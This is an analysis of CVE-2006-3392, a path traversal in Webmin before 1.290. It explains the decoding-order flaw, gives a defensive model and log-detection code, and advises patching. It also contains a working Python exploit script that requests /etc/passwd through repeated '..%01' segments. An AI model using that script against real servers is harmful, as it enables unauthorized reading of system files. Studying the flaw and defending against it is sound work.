Analysis of CVE-2006-3392: path traversal in Webmin
CVE-2006-3392[1] is a path traversal vulnerability[3] identified in Webmin[2], a web-based configuration system for Unix-like systems, affecting versions prior to 1.290. This vulnerability arises because the `simplify_path` function is invoked before HTML decoding. By crafting a sequence of bytes such as “..%01”, an attacker can bypass the removal of “../” sequences to the left of certain bytes (e.g., “%01”), enabling unauthenticated and unauthorized access to the contents of internal server files. The vulnerability was published by Kenny Chen on June 30, 2006.
Description
Webmin is a web-based configuration tool for Unix-like systems that allows administrators to configure internal system resources, including users, disks, services, and file settings. It also allows the modification and control of open-source programs such as Apache HTTP Server, PHP, and MySQL, among others.
The vulnerability in question is a path traversal caused by the `simplify_path` function being executed before HTML decoding. Because the check runs on the still-encoded path, a “..%01” segment is not recognised as “..” and is left in place; once the request is decoded, the “../” sequences reappear, enabling unauthenticated and unauthorized access to the contents of internal server files. This flaw allows unauthenticated attackers to read files from within the system through a URL containing a specially crafted payload.
The endpoint for the path traversal is located in the “/unauthenticated” directory. The payload can be constructed as follows:
Proof of Concept
```python
#!/usr/bin/env python3
# Proof of concept for CVE-2006-3392: requests a file through the
# unauthenticated Webmin endpoint using repeated "..%01" segments.
import argparse
import re
import sys

import requests


def exploit(url, file):
    # Default to HTTPS when the target was given without a scheme.
    if not re.match(r'^https?://', url):
        url = f"https://{url}"
    # Repeat the "..%01" segment so the path reaches the filesystem root
    # regardless of how deep the Webmin directory sits.
    payload = "/unauthenticated" + "/..%01" * 20
    try:
        if file is None:
            file = "/etc/passwd"
        response = requests.get(url + payload + file)
        print(response.text)
    except requests.exceptions.RequestException as e:
        # RequestException does not always carry .reason; print the exception itself.
        print(f"Error making request for {url} -> {e}")


def main():
    parser = argparse.ArgumentParser(description="CVE-2006-3392")
    parser.add_argument("-t", "--target", required=True)
    parser.add_argument("-f", "--file")
    args = parser.parse_args()
    try:
        exploit(args.target, args.file)
    except (KeyboardInterrupt, EOFError):
        sys.exit(1)


if __name__ == '__main__':
    main()
```
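The ordering defect described above, modelled in an added Python example (not Webmin's own Perl code): a textual `simplify_path`, the later URL decoding, and a later removal of non-printable bytes (assumed here as the step that turns a decoded `..\x01` back into `..`), run in the vulnerable order and in the corrected order, plus a detection check over constructed access-log lines that flags requests whose fully decoded path still contains `..`.

```python
import re
from urllib.parse import unquote

def simplify_path(path):
    """Collapse '.' and '..' segments textually (the naive canonicaliser).
    '..%01' is not equal to '..', so it passes through untouched."""
    out = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)

def strip_control_bytes(path):
    # Drop non-printable bytes; this turns a decoded '..\x01' into '..'.
    return "".join(c for c in path if 0x20 <= ord(c) < 0x7F)

def vulnerable_resolve(request_path):
    # Defective order: canonicalise first, decode and strip afterwards.
    return strip_control_bytes(unquote(simplify_path(request_path)))

def hardened_resolve(request_path):
    # Correct order: decode and strip to the final form, then canonicalise.
    # The result is a path relative to the docroot and cannot contain '..'.
    return simplify_path(strip_control_bytes(unquote(request_path)))

def escapes_root(resolved_path):
    # True if a '..' segment survived and would let the OS leave the docroot.
    return ".." in resolved_path.split("/")

def flag_traversal_requests(log_text):
    """Return request paths whose fully decoded form still contains '..'."""
    hits = []
    for line in log_text.splitlines():
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if m and escapes_root(strip_control_bytes(unquote(m.group(1)))):
            hits.append(m.group(1))
    return hits

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [30/Jun/2006:12:00:01 +0000] "GET /unauthenticated/..%01/..%01/..%01/etc/passwd HTTP/1.0" 200 1843
203.0.113.9 - - [30/Jun/2006:12:00:07 +0000] "GET /unauthenticated/style.css HTTP/1.0" 200 512
"""
```

For the request `/unauthenticated/..%01/..%01/..%01/etc/passwd`, `vulnerable_resolve` yields `/unauthenticated/../../../etc/passwd` while `hardened_resolve` yields `/etc/passwd` relative to the docroot.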
Impact
The impact of this vulnerability is considered high-risk, as it allows an unauthenticated user to access sensitive information stored on the server. This access can provide in-depth knowledge of the system’s structure and configuration, facilitating a complete compromise of the system and its applications.
Conclusion
The vulnerability in Webmin, a web-based configuration interface for Unix-like systems, results from improper handling of “..” sequences. This issue arises because the `simplify_path` function is called before HTML decoding, enabling internal system files to be read through a path traversal attack.
The specific payload exploits this flaw by using the “..%01” sequence in the URL, granting access to sensitive files such as “/etc/passwd”. Therefore, it is crucial for system administrators to be aware of this vulnerability and take immediate action to update Webmin on legacy systems to mitigate risks and protect their servers.
References
- [1] MITRE - CVE-2006-3392
- [2] Webmin
- [3] OWASP - Path Traversal